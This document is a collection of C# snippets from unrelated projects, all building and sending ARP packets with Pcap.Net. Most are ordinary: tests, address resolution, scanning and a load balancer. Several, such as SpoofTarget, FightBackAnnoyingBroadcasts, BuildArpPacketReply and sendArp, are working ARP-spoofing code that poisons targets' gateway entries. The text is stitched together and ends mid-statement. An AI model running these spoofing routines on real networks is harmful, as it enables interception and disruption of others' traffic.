public void RandomArpTest() { Random random = new Random(); for (int i = 0; i != 1000; ++i) { MacAddress ethernetSource = random.NextMacAddress(); EthernetLayer ethernetLayer = new EthernetLayer { Source = ethernetSource, }; ArpLayer arpLayer = random.NextArpLayer(); Packet packet = PacketBuilder.Build(DateTime.Now, ethernetLayer, arpLayer); Assert.IsTrue(packet.IsValid, "IsValid"); // Ethernet Assert.AreEqual(packet.Length - EthernetDatagram.HeaderLengthValue, packet.Ethernet.PayloadLength, "PayloadLength"); Assert.AreEqual(ethernetSource, packet.Ethernet.Source, "Ethernet Source"); Assert.AreEqual(EthernetDatagram.BroadcastAddress, packet.Ethernet.Destination, "Ethernet Destination"); Assert.AreEqual(EthernetType.Arp, packet.Ethernet.EtherType, "Ethernet EtherType"); // Arp Assert.AreEqual(ArpDatagram.HeaderBaseLength + 2 * arpLayer.SenderHardwareAddress.Count + 2 * arpLayer.SenderProtocolAddress.Count, packet.Ethernet.Arp.Length, "Arp length"); Assert.AreEqual(ArpHardwareType.Ethernet, packet.Ethernet.Arp.HardwareType, "Arp hardware type"); Assert.AreEqual(arpLayer, packet.Ethernet.Arp.ExtractLayer(), "ARP Layer"); Assert.AreNotEqual(arpLayer, random.NextArpLayer(), "ARP Layer"); Assert.AreEqual(arpLayer.GetHashCode(), packet.Ethernet.Arp.ExtractLayer().GetHashCode(), "ARP Layer"); ArpLayer differentArpLayer = random.NextArpLayer(); Assert.AreNotEqual(arpLayer.GetHashCode(), differentArpLayer.GetHashCode(), "ARP Layer"); } }
Packet ArpGenerator(string EthernetSourceMac, string EthernetDestinatonMac, string SenderMacAddress, IPAddress SenderIpAddress, string DestinatonMacAddress, IPAddress DestinationIpAddress, bool isRequest) { EthernetSourceMac = ValidMac(EthernetSourceMac); EthernetDestinatonMac = ValidMac(EthernetDestinatonMac); EthernetLayer ethernetLayer = new EthernetLayer { Source = new MacAddress(EthernetSourceMac), Destination = new MacAddress(EthernetDestinatonMac), EtherType = EthernetType.None, }; SenderMacAddress = ValidMac(SenderMacAddress); DestinatonMacAddress = ValidMac(DestinatonMacAddress); ArpLayer arpLayer = new ArpLayer { ProtocolType = EthernetType.IpV4, Operation = isRequest ? ArpOperation.Request : ArpOperation.Reply, SenderHardwareAddress = SenderMacAddress.Split(':').Select(x => Convert.ToByte(x, 16)).ToArray().AsReadOnly(), SenderProtocolAddress = SenderIpAddress.GetAddressBytes().AsReadOnly(), TargetHardwareAddress = DestinatonMacAddress.Split(':').Select(x => Convert.ToByte(x, 16)).ToArray().AsReadOnly(), TargetProtocolAddress = DestinationIpAddress.GetAddressBytes().AsReadOnly(), }; PacketBuilder builder = new PacketBuilder(ethernetLayer, arpLayer); return(builder.Build(DateTime.Now)); }
private Packet BuildArpPacketRequest(IpV4Address targetIp) { EthernetLayer ethernetLayer = new EthernetLayer { Source = _ownMacAddr, Destination = _macBroadcastAddr, //broadcast EtherType = EthernetType.None, // Will be filled automatically. }; ArpLayer arpLayer = new ArpLayer { ProtocolType = EthernetType.IpV4, Operation = ArpOperation.Request, SenderHardwareAddress = Array.AsReadOnly(_ownMacAddrByte), // self mac-address SenderProtocolAddress = Array.AsReadOnly(_ownIpAddrByte), // self ip-address TargetHardwareAddress = Array.AsReadOnly(_targetMacAddr), // Not Yet known TargetProtocolAddress = Helper.IpAddressToBytes(targetIp) // ip we want to get the mac for }; PacketBuilder builder = new PacketBuilder(ethernetLayer, arpLayer); return(builder.Build(DateTime.Now)); }
/* * sends arp spoofed packet to the target */ private void SpoofTarget(PacketCommunicator communicator, string targetIp) { Task.Factory.StartNew(() => { if (!_targetsPacketBuilders.ContainsKey(targetIp)) { var ether = new EthernetLayer { Source = new MacAddress(_myMac), Destination = new MacAddress(KvStore.IpMac[targetIp]), EtherType = EthernetType.None, }; var arp = new ArpLayer { ProtocolType = EthernetType.IpV4, Operation = ArpOperation.Reply, SenderHardwareAddress = ether.Source.ToBytes(), SenderProtocolAddress = new IpV4Address(_gatewayIp).ToBytes(), TargetHardwareAddress = ether.Destination.ToBytes(), TargetProtocolAddress = new IpV4Address(targetIp).ToBytes() }; _targetsPacketBuilders.Add(targetIp, new PacketBuilder(ether, arp)); } var packet = _targetsPacketBuilders[targetIp].Build(DateTime.Now); communicator.SendPacket(packet); }); }
/// <summary> /// This function build an ARP over Ethernet packet. /// </summary> public static Packet BuildArpPacket() { EthernetLayer ethernetLayer = new EthernetLayer { Source = new MacAddress("68:05:ca:1e:94:1c"), Destination = new MacAddress("FF:FF:FF:FF:FF:FF"), EtherType = EthernetType.None, // Will be filled automatically. }; ArpLayer arpLayer = new ArpLayer { ProtocolType = EthernetType.IpV4, Operation = ArpOperation.InverseRequest, SenderHardwareAddress = new byte[] { 104, 5, 202, 30, 148, 28 }.AsReadOnly(), // 68:05:ca:1e:94:1c SenderProtocolAddress = new byte[] { 10, 128, 24, 154 }.AsReadOnly(), // 1.2.3.4. TargetHardwareAddress = new byte[] { 08, 46, 95, 228, 211, 146 }.AsReadOnly(), // 04:04:04:04:04:04. TargetProtocolAddress = new byte[] { 255, 255, 255, 255 }.AsReadOnly(), // 11.22.33.44. }; PacketBuilder builder = new PacketBuilder(ethernetLayer, arpLayer); return(builder.Build(DateTime.Now)); }
public ArpRequest(IpV4Address ipV4AddressToIdentify, MacAddress requesterMacAddress, IpV4Address requesterIpV4Address, Action <MacAddress> onIdentified) { if (requesterIpV4Address == ipV4AddressToIdentify) { throw new ArgumentException($"It doesn't make sense to ask {requesterIpV4Address} who {ipV4AddressToIdentify} is."); } IpV4AddressToIdentify = ipV4AddressToIdentify; RequesterMacAddress = requesterMacAddress; RequesterIpV4Address = requesterIpV4Address; OnIdentified = onIdentified; EthernetLayer = new EthernetLayer { Source = requesterMacAddress, Destination = NetworkConstants.BroadcastMacAddress, EtherType = EthernetType.Arp }; ArpLayer = new ArpLayer { Operation = ArpOperation.Request, ProtocolType = EthernetType.IpV4, SenderHardwareAddress = requesterMacAddress.GetNetworkBytes().AsReadOnly(), SenderProtocolAddress = requesterIpV4Address.GetNetworkBytes().AsReadOnly(), TargetHardwareAddress = NetworkConstants.BroadcastMacAddress.GetNetworkBytes().AsReadOnly(), TargetProtocolAddress = ipV4AddressToIdentify.GetNetworkBytes().AsReadOnly() }; PacketBuilder = new PacketBuilder(EthernetLayer, ArpLayer); }
private Packet BuildArpWhoHasPacket(uint remoteIpInt) { // Build ethernet layer var ethernetPacket = new EthernetLayer(); ethernetPacket.EtherType = EthernetType.Arp; ethernetPacket.Source = new MacAddress(this.config.LocalMac); ethernetPacket.Destination = new MacAddress("ff:ff:ff:ff:ff:ff"); // Build ARP layer var arpPacket = new ArpLayer(); arpPacket.ProtocolType = EthernetType.IpV4; arpPacket.Operation = ArpOperation.Request; arpPacket.SenderHardwareAddress = this.localMacBytesCollection; arpPacket.SenderProtocolAddress = this.localIpBytesCollection; arpPacket.TargetHardwareAddress = new ReadOnlyCollection <byte>(new byte[6] { 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF }); byte[] ipAddresBytes = this.IpIntegerToByteArray(remoteIpInt); arpPacket.TargetProtocolAddress = new ReadOnlyCollection <byte>(ipAddresBytes); var packet = new PacketBuilder(ethernetPacket, arpPacket); return(packet.Build(DateTime.Now)); }
private void btnAddDataLink_Click(object sender, EventArgs e) { try { ArpLayer arpLayer = new ArpLayer { ProtocolType = EthernetType.IpV4, Operation = ArpOperation.Request, //SenderHardwareAddress = new byte[] { 3, 3, 3, 3, 3, 3 }.AsReadOnly(), // 03:03:03:03:03:03. SenderHardwareAddress = sourceHardwareAddr.Text.Split(':').Select(x => Convert.ToByte(x, 16)).ToArray().AsReadOnly(), // 03:03:03:03:03:03. //SenderProtocolAddress = new byte[] { 1, 2, 3, 4 }.AsReadOnly(), // 1.2.3.4. SenderProtocolAddress = IPAddress.Parse(sourceProtocolAddr.Text).GetAddressBytes().AsReadOnly(), // 1.2.3.4. //TargetHardwareAddress = new byte[] { 4, 4, 4, 4, 4, 4 }.AsReadOnly(), // 04:04:04:04:04:04. TargetHardwareAddress = destHardwareAddr.Text.Split(':').Select(x => Convert.ToByte(x, 16)).ToArray().AsReadOnly(), // 04:04:04:04:04:04. //TargetProtocolAddress = new byte[] { 11, 22, 33, 44 }.AsReadOnly(), // 11.22.33.44. TargetProtocolAddress = IPAddress.Parse(destProtocolAddr.Text).GetAddressBytes().AsReadOnly(), // 11.22.33.44. }; mainForm.addToPacket(arpLayer, "ARP -> " + sourceProtocolAddr.Text + " -> " + destProtocolAddr.Text); } catch (Exception) { MessageBox.Show("Invalid Parameters"); } }
/// <summary> /// This function build an ARP over Ethernet packet. /// </summary> public static Packet BuildArpPacket() { EthernetLayer ethernetLayer = new EthernetLayer { Source = new MacAddress(macAddressSource), Destination = new MacAddress(macAddressDest), EtherType = EthernetType.None, // Will be filled automatically. }; ArpLayer arpLayer = new ArpLayer { ProtocolType = EthernetType.IpV4, Operation = ArpOperation.Request, SenderHardwareAddress = new byte[] { 3, 3, 3, 3, 3, 3 }.AsReadOnly(), // 03:03:03:03:03:03. SenderProtocolAddress = new byte[] { 1, 2, 3, 4 }.AsReadOnly(), // 1.2.3.4. TargetHardwareAddress = new byte[] { 4, 4, 4, 4, 4, 4 }.AsReadOnly(), // 04:04:04:04:04:04. TargetProtocolAddress = new byte[] { 11, 22, 33, 44 }.AsReadOnly(), // 11.22.33.44. }; PacketBuilder builder = new PacketBuilder(ethernetLayer, arpLayer); return(builder.Build(DateTime.Now)); }
public ArpReply(MacAddress sourceMacAddress, IpV4Address sourceIpv4Address, MacAddress targetMacAddress, IpV4Address targetIpv4Address) { SourceMacAddress = sourceMacAddress; SourceIpv4Address = sourceIpv4Address; TargetMacAddress = targetMacAddress; TargetIpv4Address = targetIpv4Address; EthernetLayer = new EthernetLayer { Source = SourceMacAddress, Destination = targetMacAddress, EtherType = EthernetType.Arp }; ArpLayer = new ArpLayer { Operation = ArpOperation.Reply, ProtocolType = EthernetType.IpV4, SenderHardwareAddress = SourceMacAddress.GetNetworkBytes().AsReadOnly(), SenderProtocolAddress = SourceIpv4Address.GetNetworkBytes().AsReadOnly(), TargetHardwareAddress = TargetMacAddress.GetNetworkBytes().AsReadOnly(), TargetProtocolAddress = TargetIpv4Address.GetNetworkBytes().AsReadOnly() }; PacketBuilder = new PacketBuilder(EthernetLayer, ArpLayer); }
private static Packet BuildRouterArpPacket() { //byte[] mama = _host[1].Split('.') // .Select(t => byte.Parse(t, NumberStyles.AllowHexSpecifier)) // .ToArray(); EthernetLayer ethernetLayer = new EthernetLayer { Source = new MacAddress("90:2b:34:33:35:f3"), Destination = new MacAddress("9c:80:df:84:9b:9c"), EtherType = EthernetType.Arp, // Will be filled automatically. }; ArpLayer arpLayer = new ArpLayer { ProtocolType = EthernetType.IpV4, Operation = ArpOperation.Reply, //156, 128, 223, 132, 155, 156 // 144, 43, 52, 51, 53, 243 //192, 37, 6, 60, 172, 120 SenderHardwareAddress = new byte[] { 144, 43, 52, 51, 53, 243 }.AsReadOnly(), // 03:03:03:03:03:03. SenderProtocolAddress = new byte[] { 192, 168, 2, 176 }.AsReadOnly(), // 1.2.3.4. TargetHardwareAddress = new byte[] { 156, 128, 223, 132, 155, 156 }.AsReadOnly(), // 04:04:04:04:04:04. TargetProtocolAddress = new byte[] { 192, 168, 2, 1 }.AsReadOnly(), // 11.22.33.44. }; PacketBuilder builder = new PacketBuilder(ethernetLayer, arpLayer); return(builder.Build(DateTime.Now)); }
private static Packet ArpPacket() { EthernetLayer ethernetLayer = new EthernetLayer { Source = new MacAddress(DeviceManager.GetDeviceMac()), Destination = new MacAddress(AttackVariables.Mac), EtherType = EthernetType.None, }; ArpLayer arpLayer = new ArpLayer { ProtocolType = EthernetType.IpV4, Operation = ArpOperation.Request, SenderHardwareAddress = DeviceManager.GetDeviceMac().Split(':').Select(x => Convert.ToByte(x, 16)).ToArray().AsReadOnly(), SenderProtocolAddress = IPAddress.Parse("0.136.136.16").GetAddressBytes().AsReadOnly(), TargetHardwareAddress = AttackVariables.Mac.Split(':').Select(x => Convert.ToByte(x, 16)).ToArray().AsReadOnly(), TargetProtocolAddress = IPAddress.Parse(AttackVariables.IP).GetAddressBytes().AsReadOnly(), }; PayloadLayer payloadLayer = new PayloadLayer { Data = new Datagram(AttackVariables.BufferSize), }; PacketBuilder builder = new PacketBuilder(ethernetLayer, arpLayer, payloadLayer); return(builder.Build(DateTime.Now)); }
private void sendArp(object sender, DoWorkEventArgs e) { List <object> genericlist = e.Argument as List <object>; string attackIP = genericlist[0].ToString(); string routerMAC = genericlist[1].ToString(); string routerIP = genericlist[2].ToString(); int reps = Convert.ToInt32(genericlist[3]); string myMAC = "A0:A8:CD:9A:CB:AD"; string arpSenderMAC = "0A:5A:7B:30:3F:71"; IList <LivePacketDevice> allDevices = LivePacketDevice.AllLocalMachine; if (allDevices.Count == 0) { Console.WriteLine("No interfaces found! Make sure WinPcap is installed."); throw new Exception(); //TODO: catch exception and show error } //for (int i = 0; i != allDevices.Count; ++i) //TODO: show this in GUI somehow //{ // LivePacketDevice device = allDevices[i]; // Console.Write((i + 1) + ". " + device.Name); // if (device.Description != null) // Console.WriteLine(" (" + device.Description + ")"); // else // Console.WriteLine(" (No description available)"); //} int deviceIndex = 2; //TODO: make this choosable PacketDevice selectedDevice = allDevices[deviceIndex]; using (PacketCommunicator communicator = selectedDevice.Open(100, PacketDeviceOpenAttributes.Promiscuous, 1000)) { MacAddress source = new MacAddress(myMAC); MacAddress destination = new MacAddress(routerMAC); EthernetLayer ethLayer = new EthernetLayer { Source = source, Destination = destination }; ArpLayer arpLayer = new ArpLayer { ProtocolType = EthernetType.IpV4, Operation = ArpOperation.Request, SenderHardwareAddress = makeMAC(arpSenderMAC), SenderProtocolAddress = makeIP(attackIP), TargetHardwareAddress = new byte[] { 0, 0, 0, 0, 0, 0 }.AsReadOnly(), TargetProtocolAddress = makeIP(routerIP) }; PacketBuilder builder = new PacketBuilder(ethLayer, arpLayer); Packet packet = builder.Build(DateTime.Now); for (int i = 0; i < reps; i++) { communicator.SendPacket(packet); bg.ReportProgress((i * 100) / reps); } } }
public IList <IPAddress> GetLanIpAddresses() { var packets = new List <PcapDotNet.Packets.Packet>(); var ipAddressesToScan = this.device.Addresses.Where(x => x.Addr.sa_family == 2).SelectMany(x => this.GetIpAddresses(x.Addr, x.Netmask)).ToList(); this.OnPacketArrival += this.ReceivedNewPacket; this.StartCapture("arp"); var arp = new ARP(this.device); var ethernetLayer = new EthernetLayer() { Source = new MacAddress(this.MacAddress), Destination = new MacAddress("FF:FF:FF:FF:FF:FF"), EtherType = EthernetType.Arp, }; foreach (var ipAddressToScan in ipAddressesToScan) { var arpLayer = new ArpLayer() { Operation = ArpOperation.Request, ProtocolType = EthernetType.IpV4, SenderHardwareAddress = new ReadOnlyCollection <byte>(PhysicalAddress.Parse(this.MacAddress.Replace(":", "-")).GetAddressBytes()), SenderProtocolAddress = new ReadOnlyCollection <byte>(this.IpAddress.GetAddressBytes()), TargetHardwareAddress = new ReadOnlyCollection <byte>(new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 }), TargetProtocolAddress = new ReadOnlyCollection <byte>(ipAddressToScan.GetAddressBytes()), }; var packetBuilder = new PacketBuilder(ethernetLayer, arpLayer); packets.Add(packetBuilder.Build(DateTime.Now)); } foreach (var packet in packets) { this.SendPacket(packet.Buffer); Thread.Sleep(100); } Thread.Sleep(1000); this.StopCapture(); this.OnPacketArrival -= this.ReceivedNewPacket; return(this.onlineIpAddresses.Keys.ToList()); }
/* * broadcasts are annoying and let targets find the real router * so this will instantly send arp spoofed replay insted of the timed attack * and hopefully target is not lost for long time */ private void FightBackAnnoyingBroadcasts(LivePacketDevice nic) { var ether = new EthernetLayer { Source = new MacAddress(_myMac), Destination = new MacAddress("FF:FF:FF:FF:FF:FF"), EtherType = EthernetType.None }; Task.Run(() => { PacketCommunicator communicator = nic.Open(500, PacketDeviceOpenAttributes.None, 50); communicator.SetFilter("arp && ether dst ff:ff:ff:ff:ff:ff"); while (_status == Status.Started || _status == Status.Starting || _status == Status.Paused) { communicator.ReceivePackets(0, arp => { var sourceIp = arp.Ethernet.IpV4.Source.ToString(); if (sourceIp.Equals(_gatewayIp)) { var arplayer = new ArpLayer { ProtocolType = EthernetType.IpV4, Operation = ArpOperation.Request, SenderHardwareAddress = ether.Source.ToBytes(), SenderProtocolAddress = new IpV4Address(_gatewayIp).ToBytes(), TargetHardwareAddress = MacAddress.Zero.ToBytes(), TargetProtocolAddress = arp.Ethernet.IpV4.Destination.ToBytes() }; var packet = new PacketBuilder(ether, arplayer).Build(DateTime.Now); communicator.SendPacket(packet); } else if (KvStore.IpMac.ContainsKey(sourceIp)) { SpoofGateway(communicator, sourceIp); } }); } communicator.Dispose(); }); }
public static Packet CreateRequestFor(ScanningOptions options) { EthernetLayer ethernetLayer = new EthernetLayer { Source = options.SourceMac, Destination = options.TargetMac, EtherType = EthernetType.Arp, }; ArpLayer arpLayer = new ArpLayer { ProtocolType = EthernetType.IpV4, Operation = ArpOperation.Request, SenderHardwareAddress = options.SourceMac.GetBytesList().AsReadOnly(), SenderProtocolAddress = options.SourceIP.GetBytesList().AsReadOnly(), TargetHardwareAddress = options.TargetMac.GetBytesList().AsReadOnly(), TargetProtocolAddress = options.TargetIP.GetBytesList().AsReadOnly(), }; PacketBuilder builder = new PacketBuilder(ethernetLayer, arpLayer); return(builder.Build(DateTime.Now)); }
private static Packet BuildArpPacket(string source, string routerLocalIp) { var macAddr = GetMacAddress(); var arp = new ArpLayer { ProtocolType = EthernetType.IpV4, SenderHardwareAddress = PhysicalAddress.Parse(macAddr.Replace(":", "-")).GetAddressBytes().AsReadOnly(), TargetProtocolAddress = IPAddress.Parse(routerLocalIp).GetAddressBytes().AsReadOnly(), TargetHardwareAddress = PhysicalAddress.Parse(macAddr.Replace(":", "-")).GetAddressBytes().AsReadOnly(), SenderProtocolAddress = IPAddress.Parse(source).GetAddressBytes().AsReadOnly(), Operation = ArpOperation.Request }; var eth = new EthernetLayer { Source = new MacAddress(macAddr), Destination = new MacAddress("ff:ff:ff:ff:ff:ff"), EtherType = EthernetType.Arp }; return(PacketBuilder.Build(DateTime.Now, eth, arp)); }
public void SendReply(IpV4Address DesIP, MacAddress DesMac) { EthernetLayer ethernetLayer = new EthernetLayer { Destination = UtilityLib.BroadcastMac, Source = _adapter.MAC, EtherType = EthernetType.None }; VLanTaggedFrameLayer vlanLayer = new VLanTaggedFrameLayer { PriorityCodePoint = ClassOfService.BestEffort, CanonicalFormatIndicator = false, VLanIdentifier = _adapter.VLAN, EtherType = EthernetType.None, }; ArpLayer arpLayer = new ArpLayer { SenderHardwareAddress = _adapter.MAC.ToBytes().AsReadOnly(), SenderProtocolAddress = _adapter.IP.ToBytes().AsReadOnly(), TargetHardwareAddress = DesMac.ToBytes().AsReadOnly(), TargetProtocolAddress = DesIP.ToBytes().AsReadOnly(), ProtocolType = EthernetType.IpV4, Operation = ArpOperation.Reply, }; if (_adapter.VLAN > 1) { VirtualNetwork.Instance.SendPacket(PacketBuilder.Build(DateTime.Now, ethernetLayer, vlanLayer, arpLayer)); } else { VirtualNetwork.Instance.SendPacket(PacketBuilder.Build(DateTime.Now, ethernetLayer, arpLayer)); } VirtualNetwork.Instance.PostTraceMessage("ARP Reply: " + DesMac.ToString() + " - " + DesIP.ToString()); }
public static PacketBuilder DISTURB(ClassOfService CoS) { EthernetLayer ethernetLayer = new EthernetLayer { Source = new MacAddress("90:1B:0E:1B:DD:D8"), Destination = new MacAddress("FF:FF:FF:FF:FF:FF"), EtherType = EthernetType.None, // Will be filled automatically. }; VLanTaggedFrameLayer vLanTaggedFrameLayer = new VLanTaggedFrameLayer { PriorityCodePoint = CoS, CanonicalFormatIndicator = false, VLanIdentifier = 50, EtherType = EthernetType.Arp, }; ArpLayer arpLayer = new ArpLayer { ProtocolType = EthernetType.IpV4, Operation = ArpOperation.Request, SenderHardwareAddress = new byte[] { 144, 27, 14, 27, 221, 216 }.AsReadOnly(), // 68:05:ca:1e:94:1c SenderProtocolAddress = new byte[] { 10, 128, 24, 71 }.AsReadOnly(), // 1.2.3.4. TargetHardwareAddress = new byte[] { 255, 255, 255, 255, 255, 255 }.AsReadOnly(), // 04:04:04:04:04:04. TargetProtocolAddress = new byte[] { 10, 128, 24, 72 }.AsReadOnly(), // 11.22.33.44. }; PayloadLayer payloadLayer = new PayloadLayer { Data = new Datagram(new byte[1300]) }; return(new PacketBuilder(ethernetLayer, arpLayer, payloadLayer)); }
/* * sends initial arp spoofed packet to the target */ private void SpoofTargetInitialRequest(PacketCommunicator communicator, string targetIp) { Task.Factory.StartNew(() => { var ether = new EthernetLayer { Source = new MacAddress(_myMac), Destination = new MacAddress(KvStore.IpMac[targetIp]), EtherType = EthernetType.None, }; var arp = new ArpLayer { ProtocolType = EthernetType.IpV4, Operation = ArpOperation.Request, SenderHardwareAddress = ether.Source.ToBytes(), SenderProtocolAddress = new IpV4Address(_gatewayIp).ToBytes(), TargetHardwareAddress = MacAddress.Zero.ToBytes(), TargetProtocolAddress = new IpV4Address(targetIp).ToBytes() }; var packet = new PacketBuilder(ether, arp).Build(DateTime.Now); communicator.SendPacket(packet); }); }
private Packet BuildArpPacketReply(IpV4Address victimIp, MacAddress victimMac, IpV4Address ipToSpoof, MacAddress newSourceMac) { EthernetLayer ethernetLayer = new EthernetLayer { Source = newSourceMac, Destination = victimMac, EtherType = EthernetType.None // Will be filled automatically }; ArpLayer arpLayer = new ArpLayer { ProtocolType = EthernetType.IpV4, Operation = ArpOperation.Reply, SenderHardwareAddress = Helper.MacAddressToBytes(newSourceMac), SenderProtocolAddress = Helper.IpAddressToBytes(ipToSpoof), TargetHardwareAddress = Helper.MacAddressToBytes(victimMac), TargetProtocolAddress = Helper.IpAddressToBytes(victimIp) }; PacketBuilder builder = new PacketBuilder(ethernetLayer, arpLayer); return(builder.Build(DateTime.Now)); }
public void SendArpResponse(PacketCommunicator communicator, IpV4Address ipAddress) { var ethernetLayer = new EthernetLayer { Source = SourceMac, Destination = DestinationMac, }; var a = Regex.Matches(SourceMac.ToString().Replace(":", ""), @"\S{2}").Cast <Match>().Select(m => m.Value).ToArray(); var macParsed = new byte[a.Length]; for (int i = 0; i < a.Length; i++) { macParsed[i] = (byte)int.Parse(a[i], System.Globalization.NumberStyles.HexNumber); } var b = Regex.Matches(DestinationMac.ToString().Replace(":", ""), @"\S{2}").Cast <Match>().Select(m => m.Value).ToArray(); var targetMacParsed = new byte[b.Length]; for (int i = 0; i < b.Length; i++) { targetMacParsed[i] = (byte)int.Parse(b[i], System.Globalization.NumberStyles.HexNumber); } ArpLayer arpLayer = new ArpLayer { ProtocolType = EthernetType.IpV4, Operation = ArpOperation.Reply, SenderHardwareAddress = macParsed.AsReadOnly(), SenderProtocolAddress = ipAddress.ToString().Split('.').Select(n => Convert.ToByte(n)).ToArray().AsReadOnly(), TargetHardwareAddress = macParsed.AsReadOnly(), TargetProtocolAddress = DestinationIpV4.ToString().Split('.').Select(n => Convert.ToByte(n)).ToArray().AsReadOnly(), }; var packet = PacketBuilder.Build(DateTime.Now, ethernetLayer, arpLayer); communicator.SendPacket(packet); }
private void sendARPreply() { try { int_send_interval = Convert.ToInt32(str_send_interval); if (int_send_interval < 1 || int_send_interval > 10000) { lbl_status.Invoke(new setTextMethodDelegate(SendIntervalTooBig)); return; } byte_arp_sender_ip1 = Convert.ToByte(str_arp_sender_ip1); byte_arp_sender_ip2 = Convert.ToByte(str_arp_sender_ip2); byte_arp_sender_ip3 = Convert.ToByte(str_arp_sender_ip3); byte_arp_sender_ip4 = Convert.ToByte(str_arp_sender_ip4); byte_arp_destination_ip1 = Convert.ToByte(str_arp_destination_ip1); byte_arp_destination_ip2 = Convert.ToByte(str_arp_destination_ip2); byte_arp_destination_ip3 = Convert.ToByte(str_arp_destination_ip3); byte_arp_destination_ip4 = Convert.ToByte(str_arp_destination_ip4); str_arp_sender_macFull = str_arp_sender_mac1 + str_arp_sender_mac2 + str_arp_sender_mac3 + str_arp_sender_mac4 + str_arp_sender_mac5 + str_arp_sender_mac6; str_arp_destination_macFull = str_arp_destination_mac1 + str_arp_destination_mac2 + str_arp_destination_mac3 + str_arp_destination_mac4 + str_arp_destination_mac5 + str_arp_destination_mac6; long value_sender = long.Parse(str_arp_sender_macFull, NumberStyles.HexNumber, CultureInfo.CurrentCulture.NumberFormat); byte[] macBytes_sender = BitConverter.GetBytes(value_sender); Array.Reverse(macBytes_sender); bytes_arp_sender_mac = new byte[6]; for (int i = 0; i <= 5; i++) { bytes_arp_sender_mac[i] = macBytes_sender[i + 2]; } long value_destination = long.Parse(str_arp_destination_macFull, NumberStyles.HexNumber, CultureInfo.CurrentCulture.NumberFormat); byte[] macBytes_destination = BitConverter.GetBytes(value_destination); Array.Reverse(macBytes_destination); bytes_arp_destination_mac = new byte[6]; for (int i = 0; i <= 5; i++) { bytes_arp_destination_mac[i] = macBytes_destination[i + 2]; } } catch { lbl_status.Invoke(new setTextMethodDelegate(InputError)); return; } PacketDevice selectedDevice = devices[selectedAdapter]; using (PacketCommunicator communicator = selectedDevice.Open(1000, PacketDeviceOpenAttributes.Promiscuous, 1000)) { while (true) { try { countARPpackets += 1; PcapDotNet.Packets.Packet arp; EthernetLayer ethernetLayer = new EthernetLayer { Source = new MacAddress(str_ethernet_sender_mac1 + ":" + str_ethernet_sender_mac2 + ":" + str_ethernet_sender_mac3 + ":" + str_ethernet_sender_mac4 + ":" + str_ethernet_sender_mac5 + ":" + str_ethernet_sender_mac6), // My Mac Destination = new MacAddress(str_ethernet_destination_mac1 + ":" + str_ethernet_destination_mac2 + ":" + str_ethernet_destination_mac3 + ":" + str_ethernet_destination_mac4 + ":" + str_ethernet_destination_mac5 + ":" + str_ethernet_destination_mac6), // Remote device IP EtherType = EthernetType.Arp, }; ArpLayer arpLayer = new ArpLayer { ProtocolType = EthernetType.IpV4, Operation = ArpOperation.Reply, SenderHardwareAddress = bytes_arp_sender_mac.AsReadOnly(), // My MAC SenderProtocolAddress = new byte[] { byte_arp_sender_ip1, byte_arp_sender_ip2, byte_arp_sender_ip3, byte_arp_sender_ip4 }.AsReadOnly(), // My Router IP TargetHardwareAddress = bytes_arp_destination_mac.AsReadOnly(), TargetProtocolAddress = new byte[] { byte_arp_destination_ip1, byte_arp_destination_ip2, byte_arp_destination_ip3, byte_arp_destination_ip4 }.AsReadOnly(), }; PacketBuilder builder = new PacketBuilder(ethernetLayer, arpLayer); arp = builder.Build(DateTime.Now); communicator.SendPacket(arp); System.Threading.Thread.Sleep(int_send_interval); lbl_status.Invoke(new setTextMethodDelegate(ArpComplete)); } catch { lbl_status.Invoke(new setTextMethodDelegate(ArpFailed)); System.Threading.Thread.Sleep(int_send_interval); } } } }
public static Packet BuildArpPacket(EthernetLayer ethernetFrame, ArpLayer arpFrame) { return(new PacketBuilder(ethernetFrame, arpFrame).Build(DateTime.Now)); }
public void ReceivePackets() { // Retrieve the device list from the local machine IList <LivePacketDevice> allDevices = LivePacketDevice.AllLocalMachine; // Find the NPF device of the TAP interface PacketDevice selectedDevice = null; for (int i = 0; i != allDevices.Count; ++i) { LivePacketDevice device = allDevices[i]; if (device.Name.ToUpper().Contains(Guid.ToString().ToUpper())) { selectedDevice = device; break; } } if (selectedDevice == null) { Initialized.Set(); Global.ShowTrayTip("Load Balancer", "Interface " + Name + " not captured by WinPcap.", System.Windows.Forms.ToolTipIcon.Warning); Global.WriteLog("Load Balancer: Interface " + Name + " not captured by WinPcap."); return; } try { using (communicator = selectedDevice.Open(65536, PacketDeviceOpenAttributes.MaximumResponsiveness, 1000)) { Global.WriteLog("Load Balancer: Listening on " + Name + "..."); communicator.SetFilter("(ether dst " + ownHardwareAddressString + " and ((ip and (tcp or udp or icmp)) or arp)) or (ether dst FF:FF:FF:FF:FF:FF and arp)"); Initialized.Set(); communicator.ReceivePackets(0, (packet) => { if (!ThreadActive.IsSet) { communicator.Break(); return; } if (packet.Ethernet.EtherType == EthernetType.Arp) { if (packet.Ethernet.Arp.TargetProtocolAddress.SequenceEqual(ownProtocolAddressByte) && packet.Ethernet.Arp.Operation == ArpOperation.Request) { EthernetLayer ethernetLayer = new EthernetLayer { Source = ownHardwareAddress, Destination = packet.Ethernet.Source, EtherType = EthernetType.None, }; ArpLayer arpLayer = new ArpLayer { ProtocolType = EthernetType.IpV4, Operation = ArpOperation.Reply, SenderHardwareAddress = ownHardwareAddressByte.AsReadOnly(), SenderProtocolAddress = packet.Ethernet.Arp.TargetProtocolAddress, TargetHardwareAddress = packet.Ethernet.Arp.SenderHardwareAddress, TargetProtocolAddress = packet.Ethernet.Arp.SenderProtocolAddress, }; PacketBuilder builder = new PacketBuilder(ethernetLayer, arpLayer); SendPacket(builder.Build(DateTime.Now)); } } else if (packet.Ethernet.EtherType.ToString() == "IpV4") { if (packet.Ethernet.IpV4.Fragmentation.Options == IpV4FragmentationOptions.DoNotFragment || packet.Ethernet.IpV4.Fragmentation.Options == IpV4FragmentationOptions.None && packet.Ethernet.IpV4.Fragmentation.Offset == 0) { IpV4Handler(packet); } else if (packet.Ethernet.IpV4.Fragmentation.Options == IpV4FragmentationOptions.MoreFragments || packet.Ethernet.IpV4.Fragmentation.Options == IpV4FragmentationOptions.None && packet.Ethernet.IpV4.Fragmentation.Offset > 0) { // TODO: fix warning spam if (Global.Config.LoadBalancer.ShowTrayTipsWarnings) { Global.ShowTrayTip("Load Balancer", "IP fragmentation detected on " + Name + ".\n\nIP fragmentation is not supported.", ToolTipIcon.Warning); } Global.WriteLog("Load Balancer: IP fragmentation detected on " + Name); //fragments = fragBuffer.Add(packet); //if (fragments != null) // for (int 